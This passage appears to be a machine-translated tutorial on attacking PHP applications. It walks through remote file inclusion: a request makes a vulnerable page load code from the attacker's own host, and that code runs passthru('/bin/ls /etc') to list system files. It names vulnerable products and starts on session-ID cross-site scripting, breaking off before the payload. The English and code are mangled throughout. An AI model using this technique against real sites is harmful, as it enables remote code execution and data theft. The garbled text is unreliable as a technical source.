Some of the universal technologies such as cookie spoofings are not discussed here, and there are many online information. So, let's analyze how to use these vulnerabilities!
First, let's discuss the included file vulnerability. This vulnerability should be said to be a PHP. This is because the remote attacker can use these vulnerabilities to execute any of the Web process permission Command. Let's take an example: assume that there is such a code in A.php:
INCLUDE ($ include. "/ xxx.php");
?>
In this code, $ INCLUDE is usually a set path, but we can build a path to achieve an attack by yourself. For example, we will submit: a.php? Include = http: // web / b. PHP, this web is our space we use, of course, B.php is the code we use to attack. We can write in B.php Similar to: PASSTHRU ("/ bin / ls / etc") The code. This way, you can perform some purposeful attacks. (Note: The web server should not perform PHP code, otherwise it will be problematic. Related details Can see << How to attack common vulnerabilities in PHP programs >>). In this vulnerability, there are a lot of conditions, and in all directions: PayPal Store Front,
HotNews, Mambo Open Source, PHPDIG, YABB SE, PHPBB, Invisionboard, Solmetra Spaw Editor, Les Visiteurs, PHPGEDVIEW, X-CART, etc.
Next, let's take a look at the script command to perform a vulnerability. This is because the URI parameter submitted by the user lacks full filtering, submitting data containing malicious HTML code, which can cause the cross-station script attack, which may obtain the sensitive information of the target user. We also give an example: In the PHP TRANSPARENT PHP PHP 4.3.1, the index.php page in the following versions faces PHPSESSID lack full filtering, we can achieve the purpose of attack by this code:
